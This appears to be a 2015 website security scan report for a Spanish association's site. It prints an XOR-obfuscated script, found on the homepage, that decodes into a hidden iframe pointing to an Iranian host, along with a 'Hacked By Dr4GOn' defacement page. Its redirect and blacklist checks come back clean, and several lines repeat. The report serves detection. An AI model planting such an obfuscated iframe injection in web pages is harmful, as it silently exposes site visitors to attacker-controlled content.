Scanned pages/files
Request | Server response | Status |
http://www.asociacionmanuelazana.com/ | 200 OK Content-Length: 11983 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var enkripsi="'02'02'02'02'1Akdpcog'02qpa'1F'00jvvr'1C--`cn{cl,kp-fgom-pf,jvon'00'02qapmnnkle'1F'00lm'00'02jgkejv'1F'00332'07'00'02ukfvj'1F'00322'07'00'02kf'1F'00dpo'00'1G'1A-kdpcog'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli); Decoded script: <iframe src="http://balyan.ir/demo/rd.html" scrolling="no" height="110%" width="100%" id="frm"></iframe> Deface/Content modification. The following signature was found: Hacked By Dr4GOn <!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <title>Hacked By Dr4GOn</title> <style> #frm{ border:none; overflow:no-content; position:absolute; top:0; left:0; z-index:-100; } .wrapper{ width:100%; height:100%; background:transparent; position:absolute; z-index:-99; top:0; ...[13399 bytes skipped]... | ||
http://www.asociacionmanuelazana.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 18 Nov 2015 20:33:02 GMT Location: http://www.asociacionmanuelazana.com Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.asociacionmanuelazana.com/xmlrpc.php | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: asociacionmanuelazana.com
Result:
GET / HTTP/1.1
Host: asociacionmanuelazana.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: asociacionmanuelazana.com
Referer: http://www.google.com/search?q=asociacionmanuelazana.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: asociacionmanuelazana.com
Referer: http://www.google.com/search?q=asociacionmanuelazana.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=asociacionmanuelazana.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://asociacionmanuelazana.com/
Result: asociacionmanuelazana.com is not infected or malware details are not published yet.
Result: asociacionmanuelazana.com is not infected or malware details are not published yet.